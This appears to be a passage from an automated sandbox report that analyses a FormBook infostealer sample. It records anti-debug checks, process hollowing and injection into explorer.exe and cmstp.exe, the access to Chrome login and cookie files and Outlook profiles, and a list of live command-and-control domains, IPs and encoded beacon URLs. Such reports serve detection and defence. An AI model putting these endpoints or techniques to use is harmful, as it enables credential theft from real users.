          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B3C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B37D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B53D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B93540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BC3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BE0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BE0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BE0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B946A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BAFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B276E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B416E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BE8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B58EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B436CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BCFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BCFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B1E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B4A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B4A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B1C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B1C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B1C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B48E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BD1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B2766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BDAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BDAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B28794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B97794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B97794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B97794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B537F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B4E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B3B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B3B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B14F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B14F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B3F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BAFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BAFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BE070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BE070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B4A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B4A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B2FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BE8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B2EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\cmstp.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_0040CF93 LdrLoadDll,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 1_2_004018B6 SetUnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 1_2_00401754 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 1_2_0040632B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 1_2_00401BB3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 85.187.128.34 80
          Source: C:\Windows\explorer.exeNetwork Connect: 91.195.240.94 80
          Source: C:\Windows\explorer.exeDomain query: www.un-object.com
          Source: C:\Windows\explorer.exeDomain query: www.energyservicestation.com
          Source: C:\Windows\explorer.exeNetwork Connect: 78.141.192.145 80
          Source: C:\Windows\explorer.exeDomain query: www.white-hat.uk
          Source: C:\Windows\explorer.exeDomain query: www.thewildphotographer.co.uk
          Source: C:\Windows\explorer.exeDomain query: www.shapshit.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 192.185.17.12 80
          Source: C:\Windows\explorer.exeDomain query: www.thedivinerudraksha.com
          Source: C:\Windows\explorer.exeNetwork Connect: 199.192.30.147 80
          Source: C:\Windows\explorer.exeDomain query: www.bitservicesltd.com
          Source: C:\Windows\explorer.exeDomain query: www.younrock.com
          Source: C:\Windows\explorer.exeDomain query: www.gritslab.com
          Source: C:\Windows\explorer.exeNetwork Connect: 161.97.163.8 80
          Source: C:\Windows\explorer.exeDomain query: www.222ambking.org
          Source: C:\Windows\explorer.exeNetwork Connect: 81.17.29.149 80
          Source: C:\Windows\explorer.exeDomain query: www.fclaimrewardccpointq.shop
          Source: C:\Windows\explorer.exeNetwork Connect: 94.176.104.86 80
          Source: C:\Windows\explorer.exeNetwork Connect: 213.145.228.111 80
          Source: C:\Windows\explorer.exeNetwork Connect: 72.14.185.43 80
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeSection unmapped: C:\Windows\SysWOW64\cmstp.exe base address: 12A0000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\mcwfy.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeThread register set: target process: 3324
          Source: C:\Windows\SysWOW64\cmstp.exeThread register set: target process: 3324
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeProcess created: C:\Users\user\AppData\Local\Temp\mcwfy.exe C:\Users\user\AppData\Local\Temp\mcwfy.exe
          Source: explorer.exe, 00000004.00000000.328321537.00000000086B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.571846473.0000000005910000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.320804238.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.320804238.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.567756040.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: uProgram Manager*r
          Source: explorer.exe, 00000004.00000000.320804238.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.567756040.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.320804238.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.567756040.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000004.00000002.566841892.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.320444720.0000000000878000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanLoc*U
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 1_2_004019C5 cpuid
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 1_2_0040163B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
          Source: C:\Users\user\Desktop\u8QPnVhq0N.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.mcwfy.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.mcwfy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.361208868.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.361529431.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.361277802.0000000000540000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.566668495.0000000000550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.567494212.0000000000B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.567601687.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\cmstp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\cmstp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
          Source: C:\Windows\SysWOW64\cmstp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
          Source: C:\Windows\SysWOW64\cmstp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Windows\SysWOW64\cmstp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Windows\SysWOW64\cmstp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
          Source: C:\Windows\SysWOW64\cmstp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.mcwfy.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.mcwfy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.361208868.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.361529431.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.361277802.0000000000540000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.566668495.0000000000550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.567494212.0000000000B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.567601687.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Native API          		Path Interception1
          Access Token Manipulation          		1
          Deobfuscate/Decode Files or Information          		1
          OS Credential Dumping          		1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium3
          Ingress Tool Transfer          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts1
          Shared Modules          		Boot or Logon Initialization Scripts512
          Process Injection          		2
          Obfuscated Files or Information          		1
          Input Capture          		2
          File and Directory Discovery          		Remote Desktop Protocol1
          Data from Local System          		Exfiltration Over Bluetooth1
          Encrypted Channel          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)11
          Software Packing          		Security Account Manager16
          System Information Discovery          		SMB/Windows Admin Shares1
          Email Collection          		Automated Exfiltration4
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)2
          Virtualization/Sandbox Evasion          		NTDS141
          Security Software Discovery          		Distributed Component Object Model1
          Input Capture          		Scheduled Transfer14
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Access Token Manipulation          		LSA Secrets2
          Virtualization/Sandbox Evasion          		SSH1
          Clipboard Data          		Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common512
          Process Injection          		Cached Domain Credentials2
          Process Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
          Application Window Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
          Remote System Discovery          		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 830804 Sample: u8QPnVhq0N.exe Startdate: 20/03/2023 Architecture: WINDOWS Score: 100 37 Malicious sample detected (through community Yara rule) 2->37 39 Antivirus detection for URL or domain 2->39 41 Multi AV Scanner detection for submitted file 2->41 43 2 other signatures 2->43 9 u8QPnVhq0N.exe 19 2->9         started        process3 file4 29 C:\Users\user\AppData\Local\Temp\mcwfy.exe, PE32 9->29 dropped 12 mcwfy.exe 1 9->12         started        process5 signatures6 57 Multi AV Scanner detection for dropped file 12->57 59 Detected unpacking (changes PE section rights) 12->59 61 Machine Learning detection for dropped file 12->61 63 2 other signatures 12->63 15 mcwfy.exe 12->15         started        18 conhost.exe 12->18         started        process7 signatures8 65 Modifies the context of a thread in another process (thread injection) 15->65 67 Maps a DLL or memory area into another process 15->67 69 Sample uses process hollowing technique 15->69 71 Queues an APC in another process (thread injection) 15->71 20 explorer.exe 1 1 15->20 injected process9 dnsIp10 31 un-object.com 192.185.17.12, 49716, 80 UNIFIEDLAYER-AS-1US United States 20->31 33 www.222ambking.org 91.195.240.94, 49704, 49705, 80 SEDO-ASDE Germany 20->33 35 13 other IPs or domains 20->35 45 System process connects to network (likely due to code injection or exploit) 20->45 47 Performs DNS queries to domains with low reputation 20->47 24 cmstp.exe 13 20->24         started        27 autoconv.exe 20->27         started        signatures11 process12 signatures13 49 Tries to steal Mail credentials (via file / registry access) 24->49 51 Tries to harvest and steal browser information (history, passwords, etc) 24->51 53 Modifies the context of a thread in another process (thread injection) 24->53 55 Maps a DLL or memory area into another process 24->55

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          u8QPnVhq0N.exe46%ReversingLabsWin32.Trojan.Nsisx
          u8QPnVhq0N.exe49%VirustotalBrowse
          u8QPnVhq0N.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\mcwfy.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\mcwfy.exe33%ReversingLabsWin32.Trojan.Lazy

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          6.2.cmstp.exe.12a0000.1.unpack100%AviraHEUR/AGEN.1252160Download File
          3.2.mcwfy.exe.a30000.2.unpack100%AviraHEUR/AGEN.1252160Download File
          3.2.mcwfy.exe.6d4700.1.unpack100%AviraHEUR/AGEN.1252160Download File
          3.2.mcwfy.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.mcwfy.exe.2080000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.bitservicesltd.com2%VirustotalBrowse
          www.younrock.com1%VirustotalBrowse
          www.energyservicestation.com0%VirustotalBrowse
          www.thewildphotographer.co.uk0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.ecomofietsen.com0%Avira URL Cloudsafe
          http://www.germanreps.com0%Avira URL Cloudsafe
          http://www.thedivinerudraksha.com0%Avira URL Cloudsafe
          http://www.shapshit.xyz0%Avira URL Cloudsafe
          http://www.younrock.com/u2kb/?X51Qjm=05tPwqSdqXO2xf32BHQi8E1nUfoFa2c80hhB3sQ3FFDNPs5AZDU6EjUymll22Wm100%Avira URL Cloudmalware
          http://www.white-hat.uk0%Avira URL Cloudsafe
          http://white-hat.uk/u2kb/?X51Qjm=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr4kURdfD0Iy100%Avira URL Cloudmalware
          http://www.thewildphotographer.co.uk/u2kb/www.thewildphotographer.co.uk100%Avira URL Cloudmalware
          http://www.avisrezervee.com/u2kb/www.avisrezervee.com100%Avira URL Cloudmalware
          http://www.thedivinerudraksha.com/u2kb/100%Avira URL Cloudmalware
          http://www.mygloballojistik.online0%Avira URL Cloudsafe
          http://www.employerseervices.com/u2kb/www.employerseervices.com0%Avira URL Cloudsafe
          http://www.gritslab.com/u2kb/www.gritslab.com100%Avira URL Cloudmalware
          http://www.energyservicestation.com/u2kb/100%Avira URL Cloudmalware
          http://www.gritslab.com/u2kb/?X51Qjm=ydCzFiH7iMWnz6xHMre3IWaEcfnK5+fYQUsmgPEoYCSsyD6HgT3yZXCBsea1O+OKnOGwPNRrrKn2ANadQmZuoq3zmdf3x1nRXg==&w6DN_=E0EQSM0RCb349p100%Avira URL Cloudmalware
          http://www.white-hat.uk/u2kb/www.white-hat.uk100%Avira URL Cloudmalware
          http://www.energyservicestation.com/u2kb/www.energyservicestation.com100%Avira URL Cloudmalware
          http://www.avisrezervee.com0%Avira URL Cloudsafe
          http://www.un-object.com/u2kb/100%Avira URL Cloudmalware
          http://www.bitservicesltd.com0%Avira URL Cloudsafe
          http://www.white-hat.uk/u2kb/100%Avira URL Cloudmalware
          https://alldomains.hosting/domain-registrieren.html0%Avira URL Cloudsafe
          http://www.mygloballojistik.online/u2kb/0%Avira URL Cloudsafe
          http://www.shapshit.xyz/u2kb/?X51Qjm=Yd5Rzn4EVOpL1Cl/e5Amzdaa+E7UlYBpl8BtE0ZhlgLGbR5cH1Fns9iDSFPM0EqDoX1il4mP+EMsdt2zebBg7FEeCQ3NU/ifUg==&w6DN_=E0EQSM0RCb349p100%Avira URL Cloudmalware
          http://justinmezzell.com0%Avira URL Cloudsafe
          http://www.dzyngiri.com0%Avira URL Cloudsafe
          http://www.thewildphotographer.co.uk/u2kb/100%Avira URL Cloudmalware
          http://www.gritslab.com0%Avira URL Cloudsafe
          http://www.bitservicesltd.com/u2kb/100%Avira URL Cloudmalware
          http://www.thewildphotographer.co.uk0%Avira URL Cloudsafe
          http://www.gritslab.com/u2kb/100%Avira URL Cloudmalware
          http://www.222ambking.org/u2kb/www.222ambking.org100%Avira URL Cloudmalware
          http://www.fclaimrewardccpointq.shop/u2kb/100%Avira URL Cloudmalware
          http://www.energyservicestation.com/u2kb/?X51Qjm=IK59b/MdFRha+CUVMWpzDpHQ2riuD6F66TLC1fPPNwLnZq29gpb12AWvlZbo17UEh0sBgFvevrMQsuZfYKuAI0Y2tVIkdALeFw==&w6DN_=E0EQSM0RCb349p100%Avira URL Cloudmalware
          http://www.employerseervices.com/u2kb/0%Avira URL Cloudsafe
          http://www.fclaimrewardccpointq.shop/u2kb/www.fclaimrewardccpointq.shop100%Avira URL Cloudmalware
          http://www.younrock.com0%Avira URL Cloudsafe
          http://www.energyservicestation.com0%Avira URL Cloudsafe
          http://www.avisrezervee.com/u2kb/100%Avira URL Cloudmalware
          http://www.un-object.com/u2kb/www.un-object.com100%Avira URL Cloudmalware
          http://www.shapshit.xyz/u2kb/100%Avira URL Cloudmalware
          http://www.bitservicesltd.com/u2kb/?X51Qjm=rr+sOBvEXsBdGevUkZEAvniGWrNxzC1YNHmXivr92FQhRIIYsedRhL+YGaN2VCieGtjtLTUTzUqxDX3Wf7WovfMRM9ceCuTm3Q==&w6DN_=E0EQSM0RCb349p100%Avira URL Cloudmalware
          http://www.mygloballojistik.online/u2kb/www.mygloballojistik.online0%Avira URL Cloudsafe
          http://www.thedivinerudraksha.com/u2kb/www.thedivinerudraksha.com100%Avira URL Cloudmalware
          https://alldomains.hosting/0%Avira URL Cloudsafe
          http://www.fclaimrewardccpointq.shop100%Avira URL Cloudmalware
          http://www.ecomofietsen.com/u2kb/100%Avira URL Cloudmalware
          https://alldomains.hosting/hosting-webhosting.html0%Avira URL Cloudsafe
          http://www.222ambking.org/u2kb/?X51Qjm=IEUpLmGg2fqLmrhwDd0CH8vm0i8ubOQDFcodV2ACJcW4bHSQscR3aN4MRDv2q1O0g2vnwuasF99orDvyVUehJPYRcFQEZ60O6g==&w6DN_=E0EQSM0RCb349p100%Avira URL Cloudmalware
          http://www.white-hat.uk/u2kb/?X51Qjm=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr4kURdfD0IyZUuXLnrTzZCke5/3g9z1JjJjKyNNZNw==&w6DN_=E0EQSM0RCb349p100%Avira URL Cloudmalware
          http://www.employerseervices.com0%Avira URL Cloudsafe
          http://www.222ambking.org/u2kb/100%Avira URL Cloudmalware
          http://www.germanreps.com/u2kb/100%Avira URL Cloudmalware
          http://www.germanreps.com/u2kb/www.germanreps.com100%Avira URL Cloudmalware
          http://www.younrock.com/u2kb/?X51Qjm=05tPwqSdqXO2xf32BHQi8E1nUfoFa2c80hhB3sQ3FFDNPs5AZDU6EjUymll22Wm6Scj5xbzg3GdXyuHgSKqxyFLAdmHecJKz/g==&w6DN_=E0EQSM0RCb349p100%Avira URL Cloudmalware
          http://www.younrock.com/u2kb/www.younrock.com100%Avira URL Cloudmalware
          http://www.222ambking.org0%Avira URL Cloudsafe
          http://thedivinerudraksha.com/u2kb/?X51Qjm=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7lq2SPR1Q6pR100%Avira URL Cloudmalware
          http://www.younrock.com/u2kb/100%Avira URL Cloudmalware
          http://www.shapshit.xyz/u2kb/www.shapshit.xyz100%Avira URL Cloudmalware
          http://www.ecomofietsen.com/u2kb/www.ecomofietsen.com100%Avira URL Cloudmalware
          http://www.bitservicesltd.com/u2kb/www.bitservicesltd.com100%Avira URL Cloudmalware
          http://www.un-object.com0%Avira URL Cloudsafe
          http://www.thedivinerudraksha.com/u2kb/?X51Qjm=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7lq2SPR1Q6pROq8Gck3yLtOH/fXnE++yuD9U7pvtIMkBqNJDo2oag==&w6DN_=E0EQSM0RCb349p100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

